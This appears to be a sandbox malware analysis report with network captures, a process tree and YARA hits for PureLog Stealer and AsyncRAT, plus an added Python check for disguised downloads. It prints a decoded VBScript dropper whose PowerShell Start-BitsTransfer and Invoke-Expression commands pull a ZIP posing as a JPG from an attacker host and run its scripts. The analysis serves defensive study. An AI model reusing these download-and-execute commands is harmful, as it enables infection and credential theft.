                                            Mar 14, 2024 16:39:03.295614958 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.198153973 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.360174894 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.360227108 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.480751991 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.529989958 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.650088072 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.651108980 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.813684940 CET666649712103.195.101.9192.168.2.6
                                            Mar 14, 2024 16:39:06.813791037 CET497126666192.168.2.6103.195.101.9
                                            Mar 14, 2024 16:39:06.985414982 CET666649712103.195.101.9192.168.2.6
Timestamp                            Source Port  Dest Port  Source IP    Dest IP
Mar 14, 2024 16:35:16.735136032 CET  63026        53         192.168.2.6  1.1.1.1
Mar 14, 2024 16:35:16.826168060 CET  53           63026      1.1.1.1      192.168.2.6

Timestamp                            Source IP    Dest IP  Trans ID  OP Code             Name                 Type            Class        DNS over HTTPS
Mar 14, 2024 16:35:16.735136032 CET  192.168.2.6  1.1.1.1  0xfb45    Standard query (0)  shefonew07.ddns.net  A (IP address)  IN (0x0001)  false

Timestamp                            Source IP  Dest IP      Trans ID  Reply Code    Name                 CName  Address        Type            Class        DNS over HTTPS
Mar 14, 2024 16:35:16.826168060 CET  1.1.1.1    192.168.2.6  0xfb45    No error (0)  shefonew07.ddns.net         103.195.101.9  A (IP address)  IN (0x0001)  false
• 212.23.222.200:222

Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.6  49699        212.23.222.200  222               4552  C:\Windows\System32\wscript.exe

Timestamp                            Bytes transferred  Direction  Data
Mar 14, 2024 16:34:47.099097013 CET  335                OUT
GET /DuXgEWeDmEQIPXmX/sExygfKkJDoIUpeo.txt HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 212.23.222.200:222
Connection: Keep-Alive

Mar 14, 2024 16:34:47.290836096 CET  1286               IN
HTTP/1.1 200 OK
Date: Thu, 14 Mar 2024 15:34:47 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 07 Mar 2024 00:48:25 GMT
ETag: "437-613076ed20b8a"
Accept-Ranges: bytes
Content-Length: 1079
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/plain
                                            Data Raw: 53 65 74 20 51 50 4e 52 55 5a 56 59 49 44 44 4d 55 46 55 57 20 3d 20 57 53 63 72 69 70 74 2e 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 57 53 63 72 69 70 74 2e 53 68 65 6c 6c 22 29 0d 0a 44 53 46 48 43 43 4e 52 4f 54 46 55 52 56 4b 50 20 3d 20 22 3c 63 6f 6d 6d 61 6e 64 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 3c 61 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 20 20 20 3c 65 78 65 63 75 74 65 3e 53 74 61 72 74 2d 42 69 74 73 54 72 61 6e 73 66 65 72 20 2d 53 6f 75 72 63 65 20 22 22 68 74 74 70 3a 2f 2f 32 31 32 2e 32 33 2e 32 32 32 2e 32 30 30 3a 32 32 32 2f 44 75 58 67 45 57 65 44 6d 45 51 49 50 58 6d 58 2f 4c 65 74 73 54 72 79 54 68 69 73 53 68 6f 74 2e 6a 70 67 22 22 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 3b 20 45 78 70 61 6e 64 2d 41 72 63 68 69 76 65 20 2d 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 20 2d 44 65 73 74 69 6e 61 74 69 6f 6e 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 22 22 20 2d 46 6f 72 63 65 3b 20 53 74 61 72 74 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 22 22 3b 20 52 65 6d 6f 76 65 2d 49 74 65 6d 20 2d 50 61 74 68 20 22 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 73 4e 47 6f 62 62 6a 68 58 47 4b 73 53 61 6e 72 2e 7a 69 70 22 22 20 2d 46 6f 72 63 65 3c 2f 65 78 65 63 75 74 65 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 20 20 20 3c 2f 61 3e 22 20 26 20 5f 0d 0a 20 20 20 20 20 20 20 20 20 22 3c 2f 63 6f 6d 6d 61 6e 64 3e 22 0d 0a 0d 0a 53 65 74 20 49 4c 47 44 4b 47 57 4b 52 42 43 56 46 52 52 44 20 3d 20 43 72 65 61 74 65 4f 62 6a 65 63 74 28 22 53 63 72 69 70 74 69 6e 67 2e 46 69 6c 65 53 79 73 74 65 6d 4f 62 6a 65 63 
74 22 29 0d 0a 53 65 74 20 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 20 3d 20 49 4c 47 44 4b 47 57 4b 52 42 43 56 46 52 52 44 2e 43 72 65 61 74 65 54 65 78 74 46 69 6c 65 28 22 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 4e 44 4b 4a 50 6c 45 45 59 4c 68 4b 71 74 47 57 2e 78 6d 6c 22 2c 20 54 72 75 65 29 0d 0a 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 2e 57 72 69 74 65 20 44 53 46 48 43 43 4e 52 4f 54 46 55 52 56 4b 50 0d 0a 41 58 54 4b 45 44 56 4a 5a 51 52 59 4a 41 48 44 2e 43 6c 6f 73 65 0d 0a 0d 0a 51 50 4e 52 55 5a 56 59 49 44 44 4d 55 46 55 57 2e 52 75 6e 20 22 70 6f 77 65 72 73 68 65 6c 6c 20 2d 63 6f 6d 6d 61 6e 64 20 22 22 5b 78 6d 6c 5d 24 78 6d 6c 64 6f 63 20 3d 20 47 65 74 2d 43 6f 6e 74 65 6e 74 20 27 43 3a 5c 55 73 65 72 73 5c 50 75 62 6c 69 63 5c 4e 44 4b 4a 50 6c 45 45 59 4c 68 4b 71 74 47 57 2e 78 6d 6c 27 3b 20 24 63 6f 6d 6d 61 6e 64 20 3d 20 24 78 6d 6c 64 6f 63 2e 63 6f 6d 6d 61 6e 64 2e 61 2e 65 78 65 63 75 74 65 3b 20 49 6e 76 6f
Data Ascii (line breaks restored from the 0d 0a bytes in Data Raw; the report's dump is truncated after "Invo"):
Set QPNRUZVYIDDMUFUW = WScript.CreateObject("WScript.Shell")
DSFHCCNROTFURVKP = "<command>" & _
         "   <a>" & _
         "      <execute>Start-BitsTransfer -Source ""http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg"" -Destination ""C:\Users\Public\sNGobbjhXGKsSanr.zip""; Expand-Archive -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -DestinationPath ""C:\Users\Public\"" -Force; Start ""C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs""; Remove-Item -Path ""C:\Users\Public\sNGobbjhXGKsSanr.zip"" -Force</execute>" & _
         "   </a>" & _
         "</command>"

Set ILGDKGWKRBCVFRRD = CreateObject("Scripting.FileSystemObject")
Set AXTKEDVJZQRYJAHD = ILGDKGWKRBCVFRRD.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", True)
AXTKEDVJZQRYJAHD.Write DSFHCCNROTFURVKP
AXTKEDVJZQRYJAHD.Close

QPNRUZVYIDDMUFUW.Run "powershell -command ""[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.6  49703        212.23.222.200  222               2096  C:\Windows\System32\svchost.exe

Timestamp                            Bytes transferred  Direction  Data
Mar 14, 2024 16:34:54.673120022 CET  177                OUT
HEAD /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.8
Host: 212.23.222.200:222

Mar 14, 2024 16:34:54.858664989 CET  314                IN
HTTP/1.1 200 OK
Date: Thu, 14 Mar 2024 15:34:54 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 07 Mar 2024 01:32:20 GMT
ETag: "17b85-613080be7586c"
Accept-Ranges: bytes
Content-Length: 97157
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/jpeg

Mar 14, 2024 16:34:54.893635035 CET  228                OUT
GET /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Thu, 07 Mar 2024 01:32:20 GMT
User-Agent: Microsoft BITS/7.8
Host: 212.23.222.200:222

Mar 14, 2024 16:34:55.079904079 CET  1286               IN
HTTP/1.1 200 OK
Date: Thu, 14 Mar 2024 15:34:54 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
Last-Modified: Thu, 07 Mar 2024 01:32:20 GMT
ETag: "17b85-613080be7586c"
Accept-Ranges: bytes
Content-Length: 97157
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: image/jpeg
                                            Data Raw: 50 4b 03 04 14 00 00 00 08 00 c7 71 66 58 69 ec 44 a3 1d 01 00 00 55 02 00 00 18 00 00 00 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73 95 92 3b 6f 83 40 10 84 fb 93 ee 3f 9c a8 1c 09 21 ea 48 29 12 82 b1 63 03 e1 e1 38 05 0d 8f c5 10 c1 81 ef 81 30 bf 3e d8 58 29 30 4d da d9 bd 99 6f b4 e7 52 62 32 d6 30 e2 03 97 35 10 07 7a 81 d1 7b 59 93 7c f0 84 94 dd 9e c1 65 13 da eb 72 52 2f ed e9 63 6f b9 67 bf 3b 08 d3 fe ea 26 35 6c dd f8 b5 e9 cf e5 60 15 14 76 06 46 f3 3d f2 42 d6 71 c5 01 a3 f9 ee 38 d1 31 0a 40 3c 24 8e 13 83 41 2c c0 4d 7e 20 15 2b e5 18 a4 ac 6c 85 16 14 50 55 ca d3 9d e8 fb b8 ce 8a e1 18 f8 b6 37 74 83 89 d1 5c 19 7d 14 3a fa 73 e0 bc 6c a8 b2 c8 30 0f d7 7c 49 57 73 27 95 e8 2a 09 99 84 31 7b 9b 93 a5 2a 24 2c 80 2e f6 bf be c3 c8 a4 19 d9 e6 13 3a f4 90 4a 31 22 19 4d 5d c7 34 c3 68 ae 5c d1 8d e7 e8 c0 81 f1 e8 53 26 55 99 46 74 e7 d4 70 da 78 6f 49 5d 79 76 e8 68 49 2c 94 1b cf 43 e8 c4 b2 54 ed 21 5b bd 5e c1 bc 5d e8 1f fb f7 32 7f bf c8 6a c2 86 e8 bf 50 4b 03 04 14 00 00 00 08 00 60 71 66 58 50 b6 2b 5b 66 01 00 00 1b 02 00 00 14 00 00 00 44 6e 57 45 64 46 50 65 6d 5a 76 64 74 4b 52 73 2e 70 73 31 5d 51 bb 6e eb 30 0c dd 2f d0 7f 10 8c 0e 0e d0 08 7d 00 77 30 d0 a1 75 fa c8 90 36 88 dd bb 34 1d 14 8b 71 d4 c8 52 40 d2 09 fc f7 95 14 a3 c3 d5 42 f1 71 c8 c3 c3 8b 3f 97 ed 20 ee c5 1b 9c a6 ef 9b 6f 68 58 4c 4b df 8d df aa d9 81 ee 2d c8 0a f0 68 1a 48 d5 b2 f4 ce 85 6c 3e 09 2e eb 00 8e c1 d0 a0 56 b4 cf af cf 51 b9 82 d6 10 a3 62 e3 dd dc 6d bd 9c 01 35 68 0e d1 0f 90 6c d5 3b 12 4a 9c 63 02 8e 80 83 b8 15 9d 71 3d 03 65 e7 1e 15 30 1b d7 92 7c 72 6a 63 21 8d 62 ec e1 bf ec cc 90 b2 d6 9f 2a 56 c8 f3 ed bb 7b 54 cc 80 06 28 02 b6 ca 52 44 10 27 b8 96 35 9a b6 05 24 59 22 28 86 fc 66 92 b2 32 c1 1f 7d ef b4 c2 28 c9 e7 2c 64 6b d3 c1 57 51 bc f9 93 ac 7d c5 18 06 e6 d9 10 de 74 b1 98 6a 5d bf be 16 5d 57 10 65 63 93 15 1c 80 4d 5c 52 ce 5d 20 71 54 36 6e bb ac 
6f 17 71 a9 61 3f 92 78 68 62 cd 2f 87 a4 da b0 97 4b c5 bb 58 5f 16 eb 0f 0a 1c d7 cb 7e 63 4d b3 0e ea ae f4 e1 d9 20 71 8d 83 3c 6e 92 44 8e 46 f1 5f 80 9f bd d5 80 79 b6 4e 4c 1c 8d 07 00 8c 57 99 c1 d6 b8 c4 2a cf ca 1d fa 0e 3e 0e 3a cc fd 77 93 5d 45 3a 57 e2 6f b0 ae b7 f6 d7 dc 4d 7e 00 50 4b 03 04 14 00 00 00 08 00 87 71 66 58 fc 15 3f f5 1e 01 00 00 58 02 00 00 12 00 00 00 4e 65 77 52 64 70 46 69 72 73 74 54 72 79 2e 76 62 73 95 52 cf 6f 82 30 14 be 37 e1 7f 68 38 b9 c4 10 cf 4b 76 58 90 11 c8 14 10 c8 cc e2 05 e8 43 3b b1 95 b6 e0 c6 5f bf 2a 66 87 ca 65 c7 7e ef eb f7 23 ef 45 0c 7b 42 70 81 37 20 bb 13 e0 35 7c 2b 0b 2d e9 09 c7 51 15 0c 4b 22 bc 75 fb 9e b5 3f ab 11 cd 7b c1 c2 be 4b 68 22 52 ff 13 92 11 55 2b 96 a5 b9 7f 6c 4e 6d 11 f1 a8 b5 90 c9 c3 2f f8 ad 68 24 58 c8 e4 ea c9 c2 42 29 a8 07 47 3d 71 05 14 0a a2 f2 0b 2a 35 b3 3f d2 4a d0 b3 72 d2 03 34 8d fd 34 7a fb 8a d5 70 c9 5f 2f e7 3e 59 c6 a1 4e 6f 22 5a c7 66 5a 5f 82 94 94 33 7b 32
                                            Data Ascii: PKqfXiDUTextCZvTbYMEYspgaPVo.vbs;o@?!H)c80>X)0MoRb205z{Y|erR/cog;&5l`vF=Bq81@<$A,M~ +lPU7t\}:sl0|IWs'*1{*$,.:J1"M]4h\S&UFtpxoI]yvhI,CT![^]2jPK`qfXP+[fDnWEdFPemZvdtKRs.ps1]Qn0/}w0u64qR@Bq? ohXLK-hHl>.VQbm5hl;Jcq=e0|rjc!b*V{T(RD'5$Y"(f2}(,dkWQ}tj]]WecM\R] qT6noqa?xhb/KX_~cM q<nDF_yNLW*>:w]E:WoM~PKqfX?XNewRdpFirstTry.vbsRo07h8KvXC;_*fe~#E{Bp7 5|+-QK"u?{Kh"RU+lNm/h$XB)G=q*5?Jr44zp_/>YNo"ZfZ_3{2
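
The response above is served as image/jpeg, but the body begins with the ZIP local file header signature (50 4b 03 04) and the first three members visible in the dump are TextCZvTbYMEYspgaPVo.vbs, DnWEdFPemZvdtKRs.ps1 and NewRdpFirstTry.vbs. The following Python is an added example, not part of the report. It checks the declared Content-Type against the body's magic bytes and walks the local file headers to list the members; walking local headers needs no central directory, so it also works on a capture that is cut off like this one. The three headers are the bytes shown in the dump; the compressed data between them is zero filler of the declared compressed size, constructed because the report truncates the body.

```python
"""Check the BITS download the report captured: declared image/jpeg, delivered as a ZIP.

Added example; not part of the sandbox report. RESPONSE_HEADERS are copied from
the second HTTP session above. SAMPLE_BODY is constructed: the three ZIP local
file headers are the bytes the report's raw dump shows for
GET /DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg, but the compressed data after each
header is replaced by zero filler of the declared compressed size, because the
report truncates the body and the real deflate streams are not on the page.
"""
import struct

RESPONSE_HEADERS = {
    "Server": "Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12",
    "Content-Length": "97157",
    "Content-Type": "image/jpeg",
}

# Local file headers exactly as they appear in the report's hex dump.
REPORTED_LOCAL_HEADERS = [
    "50 4b 03 04 14 00 00 00 08 00 c7 71 66 58 69 ec 44 a3 1d 01 00 00 55 02 00 00 18 00 00 00"
    " 54 65 78 74 43 5a 76 54 62 59 4d 45 59 73 70 67 61 50 56 6f 2e 76 62 73",
    "50 4b 03 04 14 00 00 00 08 00 60 71 66 58 50 b6 2b 5b 66 01 00 00 1b 02 00 00 14 00 00 00"
    " 44 6e 57 45 64 46 50 65 6d 5a 76 64 74 4b 52 73 2e 70 73 31",
    "50 4b 03 04 14 00 00 00 08 00 87 71 66 58 fc 15 3f f5 1e 01 00 00 58 02 00 00 12 00 00 00"
    " 4e 65 77 52 64 70 46 69 72 73 74 54 72 79 2e 76 62 73",
]

LOCAL_SIG = b"PK\x03\x04"
LOCAL_FMT = "<4sHHHHHIIIHH"  # sig, version, flags, method, mtime, mdate, crc, csize, usize, nlen, xlen
LOCAL_LEN = struct.calcsize(LOCAL_FMT)  # 30 bytes


def build_sample_body():
    """Constructed body: the real headers, each followed by zero filler standing
    in for the deflate data the report does not show."""
    body = b""
    for hexstr in REPORTED_LOCAL_HEADERS:
        hdr = bytes.fromhex(hexstr)
        csize = struct.unpack_from("<I", hdr, 18)[0]  # compressed size field
        body += hdr + b"\x00" * csize
    return body


SAMPLE_BODY = build_sample_body()

MAGIC = [
    (b"PK\x03\x04", "application/zip"),
    (b"\xff\xd8\xff", "image/jpeg"),
    (b"MZ", "application/x-dosexec"),
    (b"\x89PNG\r\n\x1a\n", "image/png"),
]


def sniff(body):
    """Content type from leading magic bytes, or None if unrecognised."""
    for sig, mime in MAGIC:
        if body.startswith(sig):
            return mime
    return None


def content_type_mismatch(headers, body):
    """True when the server's Content-Type disagrees with what the bytes are."""
    declared = headers.get("Content-Type", "").split(";")[0].strip().lower()
    actual = sniff(body)
    return actual is not None and actual != declared


def zip_entries(body):
    """Walk local file headers in order. Needs no central directory, so it also
    works on a truncated capture; stops at the first non-header record or at an
    entry whose sizes live in a trailing data descriptor (general-purpose bit 3)."""
    entries, off = [], 0
    while body[off:off + 4] == LOCAL_SIG and off + LOCAL_LEN <= len(body):
        (_sig, _ver, flags, method, _mtime, _mdate, crc,
         csize, usize, nlen, xlen) = struct.unpack_from(LOCAL_FMT, body, off)
        name = body[off + LOCAL_LEN:off + LOCAL_LEN + nlen].decode("cp437", "replace")
        entries.append({"name": name, "method": method, "crc32": crc,
                        "compressed_size": csize, "uncompressed_size": usize})
        if flags & 0x08:
            break
        off += LOCAL_LEN + nlen + xlen + csize
    return entries


SCRIPT_EXT = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".ps1", ".bat", ".cmd", ".hta", ".exe", ".dll")


def script_payloads(body):
    """Names of archive members that are executable content rather than images."""
    return [e["name"] for e in zip_entries(body) if e["name"].lower().endswith(SCRIPT_EXT)]


if __name__ == "__main__":
    print("declared:", RESPONSE_HEADERS["Content-Type"], " actual:", sniff(SAMPLE_BODY))
    print("mismatch:", content_type_mismatch(RESPONSE_HEADERS, SAMPLE_BODY))
    for entry in zip_entries(SAMPLE_BODY):
        print(entry)
    print("script payloads:", script_payloads(SAMPLE_BODY))
```

On a proxy or mail gateway the Content-Type check alone is enough to flag this download; the header walk is what tells an analyst that the "image" carries three scripts before the archive has been written to disk.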


Target ID: 0
Start time: 16:34:45
Start date: 14/03/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Summaryform_FXnbLLyKOJ.wsf"
Imagebase: 0x7ff7cfcd0000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

                                            Target ID:3
                                            Start time:16:34:46
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEYLhKqtGW.xml'; $command = $xmldoc.command.a.execute; Invoke-Expression $command
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:4
                                            Start time:16:34:46
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:5
                                            Start time:16:34:48
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                            Imagebase:0x7ff7403e0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:6
                                            Start time:16:34:57
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\Public\TextCZvTbYMEYspgaPVo.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:7
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:8
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:9
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:10
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nKNmegHQBbmlQMTN.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:11
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:12
                                            Start time:16:34:58
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:13
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\wscript.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\Public\NewRdpFirstTry.vbs"
                                            Imagebase:0x7ff7cfcd0000
                                            File size:170'496 bytes
                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:high
                                            Has exited:true

                                            Target ID:14
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net.exe
                                            Wow64 process (32bit):false
                                            Commandline:"C:\Windows\System32\net.exe" session
                                            Imagebase:0x7ff7ed130000
                                            File size:59'904 bytes
                                            MD5 hash:0BD94A338EEA5A4E1F2830AE326E6D19
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Reputation:moderate
                                            Has exited:true

                                            Target ID:15
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:16
                                            Start time:16:35:02
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\net1.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\net1 session
                                            Imagebase:0x7ff7d7450000
                                            File size:183'808 bytes
                                            MD5 hash:55693DF2BB3CBE2899DFDDF18B4EB8C9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:18
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\cmd.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\Public\solankedoubledigits.bat" "
                                            Imagebase:0x7ff638f60000
                                            File size:289'792 bytes
                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:19
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\conhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                            Imagebase:0x7ff66e660000
                                            File size:862'208 bytes
                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Target ID:20
                                            Start time:16:35:03
                                            Start date:14/03/2024
                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            Wow64 process (32bit):false
                                            Commandline:powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
                                            Imagebase:0x7ff6e3d50000
                                            File size:452'608 bytes
                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Yara matches:
                                            • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000014.00000002.2623732842.0000013852E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                            • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
